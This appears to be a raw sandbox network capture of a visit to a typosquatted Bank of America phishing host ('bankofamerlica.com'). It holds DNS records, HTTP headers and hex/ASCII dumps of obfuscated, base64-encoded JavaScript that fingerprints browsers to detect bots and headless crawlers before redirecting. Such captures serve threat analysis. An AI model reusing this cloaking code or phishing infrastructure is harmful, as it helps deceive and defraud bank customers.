Jan 15, 2025 17:44:42.858436108 CET	1.1.1.1	192.168.2.18	0xbe30	No error (0)	virustotal.com		216.239.36.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:42.858436108 CET	1.1.1.1	192.168.2.18	0xbe30	No error (0)	virustotal.com		216.239.32.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:42.858436108 CET	1.1.1.1	192.168.2.18	0xbe30	No error (0)	virustotal.com		216.239.34.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:42.858436108 CET	1.1.1.1	192.168.2.18	0xbe30	No error (0)	virustotal.com		216.239.38.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:43.496136904 CET	1.1.1.1	192.168.2.18	0xf279	No error (0)	www.virustotal.com		34.54.88.138	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:44.150206089 CET	1.1.1.1	192.168.2.18	0x14ce	No error (0)	www.recaptcha.net		142.250.186.163	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:45.083528996 CET	1.1.1.1	192.168.2.18	0xc4e	No error (0)	www.recaptcha.net		142.250.186.163	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:49.299380064 CET	1.1.1.1	192.168.2.18	0x6820	No error (0)	www.virustotal.com		34.54.88.138	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:49.639787912 CET	1.1.1.1	192.168.2.18	0xd531	No error (0)	recaptcha.net		142.250.184.195	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:50.591588020 CET	1.1.1.1	192.168.2.18	0x78dc	No error (0)	recaptcha.net		142.250.185.227	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:55.010410070 CET	1.1.1.1	192.168.2.18	0xbded	No error (0)	recaptcha.net		142.250.185.227	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:57.493834019 CET	1.1.1.1	192.168.2.18	0xe6e5	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:57.494205952 CET	1.1.1.1	192.168.2.18	0x259c	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 15, 2025 17:44:58.561458111 CET	1.1.1.1	192.168.2.18	0xf8d3	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:58.561496019 CET	1.1.1.1	192.168.2.18	0x23f3	No error (0)	www.google.com			65	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:36 UTC	746	OUT	GET /?ref=9854tjwe46 HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://connectauthentication.blob.core.windows.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 16:43:36 UTC	608	IN	HTTP/1.1 302 See Other Date: Wed, 15 Jan 2025 16:43:36 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: ref=9854tjwe46; expires=Wed, 15-Jan-2025 17:43:36 GMT; Max-Age=3600; path=/ Set-Cookie: referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; expires=Wed, 15-Jan-2025 17:43:36 GMT; Max-Age=3600; path=/ Location: secure/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:36 UTC	886	OUT	GET /secure/ HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://connectauthentication.blob.core.windows.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; ref=9854tjwe46; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
2025-01-15 16:43:36 UTC	276	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 09 Feb 2024 14:04:00 GMT ETag: "26be6-610f36651d400" Accept-Ranges: bytes Content-Length: 158694 Vary: Accept-Encoding Connection: close Content-Type: text/html
2025-01-15 16:43:36 UTC	16384	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e Data Ascii: <!DOCTYPE HTML><html lang="en"> <head> <title>Checking your browser...</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.
2025-01-15 16:43:36 UTC	16384	IN	Data Raw: 63 6d 30 6e 4c 43 64 69 63 6d 39 33 63 32 56 79 54 47 46 75 5a 33 56 68 5a 32 55 6e 4c 43 64 72 62 6d 56 6c 4a 79 77 6e 64 6d 46 73 64 57 55 6e 4c 43 64 74 63 31 64 79 61 58 52 6c 55 48 4a 76 5a 6d 6c 73 5a 58 4a 4e 59 58 4a 72 4a 79 77 6e 62 47 39 6e 4d 54 41 6e 4c 43 63 6a 62 57 56 30 5a 57 39 79 5a 57 52 66 63 32 68 68 63 6d 55 6e 4c 43 64 7a 64 57 5a 6d 61 58 68 6c 63 79 63 73 4a 31 6c 57 64 47 39 6a 62 56 5a 74 57 47 6f 77 61 57 46 49 55 6a 42 6a 52 47 39 32 54 44 4a 47 61 32 52 74 4d 57 68 69 62 55 5a 75 57 6c 68 4a 64 57 52 48 56 6d 70 68 52 31 6f 78 59 6d 6b 31 64 32 4a 44 4f 58 6c 61 56 31 4a 77 59 32 31 57 61 6d 52 44 4f 47 6c 59 55 54 30 39 4a 79 77 6e 63 47 46 79 5a 57 35 30 54 6d 39 6b 5a 53 63 73 4a 33 56 6a 64 32 56 69 4a 79 77 6e 64 32 6c Data Ascii: cm0nLCdicm93c2VyTGFuZ3VhZ2UnLCdrbmVlJywndmFsdWUnLCdtc1dyaXRlUHJvZmlsZXJNYXJrJywnbG9nMTAnLCcjbWV0ZW9yZWRfc2hhcmUnLCdzdWZmaXhlcycsJ1lWdG9jbVZtWGowaWFIUjBjRG92TDJGa2RtMWhibUZuWlhJdWRHVmphR1oxYmk1d2JDOXlaV1JwY21WamRDOGlYUT09JywncGFyZW50Tm9kZScsJ3Vjd2ViJywnd2l
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 4d 48 67 78 4e 44 51 31 4e 6d 4a 62 4d 48 67 78 58 54 31 66 4d 48 67 79 4e 44 63 30 4e 44 45 38 50 46 38 77 65 44 4e 68 4e 6d 55 78 59 6e 78 66 4d 48 67 78 4e 44 51 31 4e 6d 4a 62 4d 48 67 78 58 54 34 2b 50 6a 42 34 4d 6a 41 74 58 7a 42 34 4d 32 45 32 5a 54 46 69 4b 54 74 39 5a 6e 56 75 59 33 52 70 62 32 34 67 65 53 68 66 4d 48 67 78 4f 57 59 35 4d 57 51 73 58 7a 42 34 59 54 46 6a 4e 47 55 33 4b 58 73 77 65 44 41 68 50 54 30 6f 58 7a 42 34 59 54 46 6a 4e 47 55 33 4a 54 30 77 65 44 51 77 4b 53 59 6d 4b 46 38 77 65 47 45 78 59 7a 52 6c 4e 7a 77 77 65 44 49 77 50 79 68 66 4d 48 67 78 4f 57 59 35 4d 57 52 62 4d 48 67 77 58 54 31 66 4d 48 67 78 4f 57 59 35 4d 57 52 62 4d 48 67 78 58 54 34 2b 50 6a 42 34 4d 6a 41 74 58 7a 42 34 59 54 46 6a 4e 47 55 33 4c 46 38 Data Ascii: MHgxNDQ1NmJbMHgxXT1fMHgyNDc0NDE8PF8weDNhNmUxYnxfMHgxNDQ1NmJbMHgxXT4+PjB4MjAtXzB4M2E2ZTFiKTt9ZnVuY3Rpb24geShfMHgxOWY5MWQsXzB4YTFjNGU3KXsweDAhPT0oXzB4YTFjNGU3JT0weDQwKSYmKF8weGExYzRlNzwweDIwPyhfMHgxOWY5MWRbMHgwXT1fMHgxOWY5MWRbMHgxXT4+PjB4MjAtXzB4YTFjNGU3LF8
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 66 54 74 66 4d 48 67 7a 4d 6a 55 31 4d 32 4d 6f 4b 54 74 39 4b 56 30 37 59 32 46 7a 5a 53 41 77 65 44 55 36 58 7a 42 34 4e 47 52 6d 4e 7a 4d 31 57 79 64 7a 5a 57 35 30 4a 31 30 6f 4b 53 78 66 4d 48 67 30 5a 47 59 33 4d 7a 56 62 4a 32 78 68 59 6d 56 73 4a 31 30 39 4d 48 67 32 4f 32 4e 68 63 32 55 67 4d 48 67 32 4f 6e 4a 6c 64 48 56 79 62 69 68 75 64 57 78 73 50 54 30 39 4b 46 38 77 65 44 63 32 4d 32 55 77 4d 44 31 75 64 57 78 73 50 54 30 39 4b 46 38 77 65 44 4d 78 4e 7a 49 79 5a 54 31 66 4d 48 67 78 4d 6d 52 6c 59 7a 6c 62 58 7a 42 34 4d 6a 4e 6b 5a 57 46 6a 4b 44 42 34 4d 6d 4d 30 4b 56 30 70 66 48 78 32 62 32 6c 6b 49 44 42 34 4d 44 30 39 50 56 38 77 65 44 4d 78 4e 7a 49 79 5a 54 39 32 62 32 6c 6b 49 44 42 34 4d 44 70 66 4d 48 67 7a 4d 54 63 79 4d 6d 56 Data Ascii: fTtfMHgzMjU1M2MoKTt9KV07Y2FzZSAweDU6XzB4NGRmNzM1WydzZW50J10oKSxfMHg0ZGY3MzVbJ2xhYmVsJ109MHg2O2Nhc2UgMHg2OnJldHVybihudWxsPT09KF8weDc2M2UwMD1udWxsPT09KF8weDMxNzIyZT1fMHgxMmRlYzlbXzB4MjNkZWFjKDB4MmM0KV0pfHx2b2lkIDB4MD09PV8weDMxNzIyZT92b2lkIDB4MDpfMHgzMTcyMmV
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 50 31 73 77 65 44 51 73 4b 46 38 77 65 44 46 6a 4e 54 42 69 59 54 31 6b 62 32 4e 31 62 57 56 75 64 43 77 6f 58 7a 42 34 4d 57 4d 31 4d 47 4a 68 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 4d 33 4f 43 6c 64 66 48 78 66 4d 48 67 78 59 7a 55 77 59 6d 46 62 4a 32 31 7a 52 58 68 70 64 45 5a 31 62 47 78 7a 59 33 4a 6c 5a 57 34 6e 58 58 78 38 58 7a 42 34 4d 57 4d 31 4d 47 4a 68 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 49 30 5a 53 6c 64 66 48 78 66 4d 48 67 78 59 7a 55 77 59 6d 46 62 58 7a 42 34 4d 7a 67 78 4d 7a 5a 6c 4b 44 42 34 4d 7a 63 32 4b 56 30 70 57 31 38 77 65 44 4d 34 4d 54 4d 32 5a 53 67 77 65 44 4e 6c 4f 53 6c 64 4b 46 38 77 65 44 46 6a 4e 54 42 69 59 53 6b 70 58 54 70 62 4d 48 67 7a 4c 44 42 34 4d 6c 30 36 57 7a 42 34 4d 79 77 Data Ascii: P1sweDQsKF8weDFjNTBiYT1kb2N1bWVudCwoXzB4MWM1MGJhW18weDM4MTM2ZSgweDM3OCldfHxfMHgxYzUwYmFbJ21zRXhpdEZ1bGxzY3JlZW4nXXx8XzB4MWM1MGJhW18weDM4MTM2ZSgweDI0ZSldfHxfMHgxYzUwYmFbXzB4MzgxMzZlKDB4Mzc2KV0pW18weDM4MTM2ZSgweDNlOSldKF8weDFjNTBiYSkpXTpbMHgzLDB4Ml06WzB4Myw
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 4d 6d 59 32 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 7a 59 32 51 70 4c 46 38 77 65 44 56 68 4f 44 59 30 4e 43 67 77 65 44 4a 6a 59 79 6b 73 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 57 5a 6b 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 79 4d 44 51 70 58 53 77 6e 5a 6d 46 75 59 6d 39 35 55 32 39 6a 61 57 46 73 4a 7a 70 62 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 6a 56 6c 4b 53 78 66 4d 48 67 31 59 54 67 32 4e 44 51 6f 4d 48 67 79 4d 57 51 70 4c 46 38 77 65 44 56 68 4f 44 59 30 4e 43 67 77 65 44 4d 77 5a 69 6b 73 58 7a 42 34 4e 57 45 34 4e 6a 51 30 4b 44 42 34 4d 6a 6c 6b 4b 53 77 6e 4c 6d 4e 76 62 57 31 31 62 6d 6c 30 65 56 39 66 63 32 39 6a 61 57 46 73 4c 57 52 6c 63 32 4d 6e 58 53 77 6e 5a 6e 4a 6c 62 47 78 Data Ascii: MmY2KSxfMHg1YTg2NDQoMHgzY2QpLF8weDVhODY0NCgweDJjYyksXzB4NWE4NjQ0KDB4MWZkKSxfMHg1YTg2NDQoMHgyMDQpXSwnZmFuYm95U29jaWFsJzpbXzB4NWE4NjQ0KDB4MjVlKSxfMHg1YTg2NDQoMHgyMWQpLF8weDVhODY0NCgweDMwZiksXzB4NWE4NjQ0KDB4MjlkKSwnLmNvbW11bml0eV9fc29jaWFsLWRlc2MnXSwnZnJlbGx
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 61 57 39 75 4a 7a 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 5a 68 63 69 42 66 4d 48 67 78 59 32 52 6d 4d 47 55 39 58 7a 42 34 4d 32 5a 6b 4e 6a 6b 77 4f 33 4a 6c 64 48 56 79 62 69 45 68 5a 47 55 6f 58 7a 42 34 4d 57 4e 6b 5a 6a 42 6c 4b 44 42 34 4d 32 4e 6c 4b 53 6c 38 66 43 46 6b 5a 53 68 66 4d 48 67 78 59 32 52 6d 4d 47 55 6f 4d 48 67 79 4d 7a 4d 70 4b 53 59 6d 64 6d 39 70 5a 43 41 77 65 44 41 37 66 53 77 6e 63 6d 56 6b 64 57 4e 6c 5a 46 52 79 59 57 35 7a 63 47 46 79 5a 57 35 6a 65 53 63 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 32 59 58 49 67 58 7a 42 34 4e 54 63 31 5a 54 51 7a 50 56 38 77 65 44 4e 6d 5a 44 59 35 4d 44 74 79 5a 58 52 31 63 6d 34 68 49 57 5a 6c 4b 46 38 77 65 44 55 33 4e 57 55 30 4d 79 67 77 65 44 4e 6a 5a 53 6b 70 66 48 77 Data Ascii: aW9uJzpmdW5jdGlvbigpe3ZhciBfMHgxY2RmMGU9XzB4M2ZkNjkwO3JldHVybiEhZGUoXzB4MWNkZjBlKDB4M2NlKSl8fCFkZShfMHgxY2RmMGUoMHgyMzMpKSYmdm9pZCAweDA7fSwncmVkdWNlZFRyYW5zcGFyZW5jeSc6ZnVuY3Rpb24oKXt2YXIgXzB4NTc1ZTQzPV8weDNmZDY5MDtyZXR1cm4hIWZlKF8weDU3NWU0MygweDNjZSkpfHw
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 67 31 4b 79 31 77 59 58 4a 7a 5a 55 6c 75 64 43 68 66 4d 48 67 78 4e 6d 55 30 5a 44 63 6f 4d 48 68 69 4e 69 6b 70 4c 7a 42 34 4e 69 6f 6f 4c 58 42 68 63 6e 4e 6c 53 57 35 30 4b 46 38 77 65 44 45 32 5a 54 52 6b 4e 79 67 77 65 44 6b 33 4b 53 6b 76 4d 48 67 33 4b 53 74 77 59 58 4a 7a 5a 55 6c 75 64 43 68 66 4d 48 67 78 4e 6d 55 30 5a 44 63 6f 4d 48 67 78 4e 44 45 70 4b 53 38 77 65 44 67 72 63 47 46 79 63 32 56 4a 62 6e 51 6f 58 7a 42 34 4d 54 5a 6c 4e 47 51 33 4b 44 42 34 4d 54 41 77 4b 53 6b 76 4d 48 67 35 4b 69 67 74 63 47 46 79 63 32 56 4a 62 6e 51 6f 58 7a 42 34 4d 54 5a 6c 4e 47 51 33 4b 44 42 34 59 32 49 70 4b 53 38 77 65 47 45 70 4f 32 6c 6d 4b 46 38 77 65 44 4e 6d 4d 57 4a 68 5a 44 30 39 50 56 38 77 65 44 4e 6b 4f 44 63 79 59 53 6c 69 63 6d 56 68 61 Data Ascii: g1Ky1wYXJzZUludChfMHgxNmU0ZDcoMHhiNikpLzB4NiooLXBhcnNlSW50KF8weDE2ZTRkNygweDk3KSkvMHg3KStwYXJzZUludChfMHgxNmU0ZDcoMHgxNDEpKS8weDgrcGFyc2VJbnQoXzB4MTZlNGQ3KDB4MTAwKSkvMHg5KigtcGFyc2VJbnQoXzB4MTZlNGQ3KDB4Y2IpKS8weGEpO2lmKF8weDNmMWJhZD09PV8weDNkODcyYSlicmVha
2025-01-15 16:43:37 UTC	16384	IN	Data Raw: 31 68 63 6d 56 4b 55 79 63 73 4a 33 52 6f 5a 57 34 6e 4c 43 64 70 62 6d 52 6c 65 45 39 6d 4a 79 77 6e 59 6e 4a 76 64 33 4e 6c 63 6b 56 75 5a 32 6c 75 5a 55 74 70 62 6d 51 6e 4c 43 64 51 61 47 46 75 64 47 39 74 53 6c 4d 6e 4c 43 64 6a 62 32 46 6a 61 47 70 7a 4a 79 77 6e 62 57 6c 74 5a 56 52 35 63 47 56 7a 51 32 39 75 63 32 6c 7a 64 47 56 75 64 43 63 73 4a 32 52 6c 64 47 56 6a 64 43 63 73 4a 33 52 76 55 33 52 79 61 57 35 6e 4a 79 77 6e 64 32 56 6a 61 47 46 30 4a 79 77 6e 62 47 56 75 5a 33 52 6f 4a 79 77 6e 58 31 39 33 5a 57 4a 6b 63 6d 6c 32 5a 58 4a 47 64 57 35 6a 4a 79 77 6e 63 6e 52 30 4a 79 77 6e 61 47 56 68 5a 47 78 6c 63 33 4e 66 59 32 68 79 62 32 31 6c 4a 79 77 6e 64 32 6c 75 5a 47 39 33 4c 6b 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 78 34 4d Data Ascii: 1hcmVKUycsJ3RoZW4nLCdpbmRleE9mJywnYnJvd3NlckVuZ2luZUtpbmQnLCdQaGFudG9tSlMnLCdjb2FjaGpzJywnbWltZVR5cGVzQ29uc2lzdGVudCcsJ2RldGVjdCcsJ3RvU3RyaW5nJywnd2VjaGF0JywnbGVuZ3RoJywnX193ZWJkcml2ZXJGdW5jJywncnR0JywnaGVhZGxlc3NfY2hyb21lJywnd2luZG93Lk5vdGlmaWNhdGlvblx4M
2025-01-15 16:43:37 UTC	11238	IN	Data Raw: 42 34 4d 54 56 69 4b 56 30 70 50 6a 30 77 65 44 4e 38 66 46 38 77 65 44 4d 30 4d 54 41 31 4d 56 74 66 4d 48 68 6b 59 6a 46 6d 4e 32 55 6f 4d 48 67 78 4d 7a 41 70 58 53 68 66 4d 48 67 78 5a 54 63 78 4e 57 46 62 58 7a 42 34 5a 47 49 78 5a 6a 64 6c 4b 44 42 34 4f 57 4d 70 58 53 6b 37 5a 57 78 7a 5a 58 74 70 5a 69 68 66 4d 48 68 6b 59 6a 46 6d 4e 32 55 6f 4d 48 67 78 4d 54 49 70 50 54 31 30 65 58 42 6c 62 32 59 67 58 7a 42 34 4d 57 55 33 4d 54 56 68 57 31 38 77 65 47 52 69 4d 57 59 33 5a 53 67 77 65 44 6c 6a 4b 56 30 70 65 33 5a 68 63 69 42 66 4d 48 67 31 4e 47 45 77 4d 54 67 39 58 7a 42 34 4d 57 55 33 4d 54 56 68 57 79 64 73 59 57 35 6e 64 57 46 6e 5a 58 4d 6e 58 54 74 66 4d 48 67 31 4e 47 45 77 4d 54 67 6d 4a 6c 38 77 65 44 4d 30 4d 54 41 31 4d 56 74 66 4d Data Ascii: B4MTViKV0pPj0weDN8fF8weDM0MTA1MVtfMHhkYjFmN2UoMHgxMzApXShfMHgxZTcxNWFbXzB4ZGIxZjdlKDB4OWMpXSk7ZWxzZXtpZihfMHhkYjFmN2UoMHgxMTIpPT10eXBlb2YgXzB4MWU3MTVhW18weGRiMWY3ZSgweDljKV0pe3ZhciBfMHg1NGEwMTg9XzB4MWU3MTVhWydsYW5ndWFnZXMnXTtfMHg1NGEwMTgmJl8weDM0MTA1MVtfM

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:38 UTC	773	OUT	GET /favicon.ico HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/secure/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
2025-01-15 16:43:38 UTC	553	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:38 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: ppath=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: stp=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Vary: Accept-Encoding Content-Length: 4178 Connection: close Content-Type: text/html; charset=UTF-8
2025-01-15 16:43:38 UTC	4178	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 7c 20 50 61 74 68 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en-us"><head><meta charset="utf-8"><meta http-equiv="x-ua-compatible" content="ie=edge"><title>Service Unavailable \| Path</title><meta name="viewport" content="width=device-width, initial-scale=1"><style>

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:38 UTC	825	OUT	POST /secure/secure.php HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive Content-Length: 76 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/json Accept: / Origin: https://online.access.secure.bankofamerlica.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://online.access.secure.bankofamerlica.com/secure/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
2025-01-15 16:43:38 UTC	76	OUT	Data Raw: 7b 22 72 69 22 3a 22 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 2c 22 69 62 22 3a 22 30 22 2c 22 72 65 22 3a 22 22 2c 22 72 66 22 3a 22 39 38 35 34 74 6a 77 65 34 36 22 7d Data Ascii: {"ri":"5a4d22e2b2bbd8eeecd1e5b6b012d987","ib":"0","re":"","rf":"9854tjwe46"}
2025-01-15 16:43:39 UTC	276	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:38 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:39 UTC	512	OUT	GET /secure/secure.php HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
2025-01-15 16:43:40 UTC	276	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:40 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:39 UTC	867	OUT	GET / HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://online.access.secure.bankofamerlica.com/secure/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
